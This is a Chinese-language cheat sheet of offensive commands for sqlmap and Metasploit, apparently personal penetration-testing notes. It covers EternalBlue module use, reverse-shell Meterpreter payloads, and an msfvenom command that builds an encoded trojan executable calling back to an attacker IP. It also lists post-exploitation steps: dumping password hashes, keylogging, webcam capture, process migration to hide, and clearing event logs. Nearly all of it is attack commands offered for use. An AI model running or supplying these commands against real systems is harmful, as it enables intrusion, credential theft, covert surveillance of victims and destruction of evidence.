一、测试
sqlmap -u "网址"
二、msf用法
2.1.常用命令
基础命令:
msfconsole 启动Metasploit控制台 help 查看帮助 search <关键词> 搜索模块(如search eternalblue) use <模块路径> 使用某个模块(如use exploit/windows/smb/ms17_010_eternalblue) show options 显示当前模块的配置选项 set <参数> <值> 设置参数(如set RHOSTS 192.168.1.1) setg <参数> <值> 全局设置参数(对所有模块生效) unset <参数> 取消参数设置 back 退出当前模块 exit/quit 退出msfconsole
查看模块:show exploits 显示所有漏洞利用模块
show payloads 显示当前模块可用的Payload
show auxiliary 显示所有辅助模块
show encoders 显示编码器
show nops 显示NOP生成器
漏洞利用:
# 设置Payload(例如反向Shell)
set payload windows/x64/meterpreter/reverse_tcp
# 设置监听IP(本机)
set LHOST 192.168.1.100
set LPORT 4444
# 执行漏洞利用
run
# 或
exploit
# 后台执行(保持会话)
exploit -j
会话管理
sessions 查看所有活跃会话
sessions -i <ID> 进入指定会话(如sessions -i 1)
background 将当前会话放到后台(快捷键:Ctrl+Z)
kill <ID> 结束指定会话
sessions -u <ID> 升级Shell为Meterpreter会话
Meterpreter常用命令
sysinfo 查看目标系统信息
getuid 查看当前用户权限
shell 切换到系统Shell
upload <本地文件> <远程路径> 上传文件
download <远程文件> <本地路径> 下载文件
ps 查看进程列表
migrate <PID> 迁移进程(提权/隐藏)
run post/windows/gather/hashdump 导出密码哈希
screenshot 截屏
keyscan_start 开始键盘记录
keyscan_dump 导出键盘记录
webcam_snap 摄像头拍照
clearev 清除日志
搜索:
search type:auxiliary name:smb # 搜索SMB相关辅助模块
search cve:2023-1234 # 搜索特定CVE编号
search platform:windows eternal # 搜索Windows平台的永恒之蓝相关
2.1模块路径:
exploit漏洞利用模块路径:/usr/share/metasploit-framework/modules/exploits
payload模块路径:/usr/share/metasploit-framework/modules/payloads,常见的payload有:
windows/meterpreter/bind_tcp #正向连接 windows/meterpreter/reverse_tcp #反向连接,常用 windows/meterpreter/reverse_http #通过监听80端口反向连接 windows/meterpreter/reverse_https #通过监听443端口反向连接 正向连接使用场景:我们的攻击机在内网环境,被攻击机是外网环境,由于被攻击机无法主动连接到我们的主机,所以就必须我们主动连接被攻击机了。但是这里经常遇到的问题是,被攻击机上开了防火墙,只允许访问指定的端口 反向连接使用场景:我们的主机和被攻击机都是在外网或者都是在内网,这样被攻击机就能主动连接到我们的主机了。如果是这样的情况,建议使用反向连接,因为反向连接的话,即使被攻击机开了防火墙也没事,防火墙只是阻止进入被攻击机的流量,而不会阻止被攻击机主动向外连接的流量。 反向连接80和443端口使用场景:被攻击机能主动连接到我们的主机,还有就是被攻击机的防火墙设置的特别严格,就连被攻击机访问外部网络的流量也进行了严格的限制,只允许被攻击机的80端口或443端口与外部通信
2.3案例
生成木马:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o payload.exe
设置远程监听 msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lport run
后期迁移
# 在Meterpreter会话中运行:
run post/windows/manage/migrate # 自动进程迁移
run post/multi/gather/ping_sweep # 内网存活主机扫描
# 在msfconsole中使用:
use post/windows/gather/enum_shares
set SESSION 1
run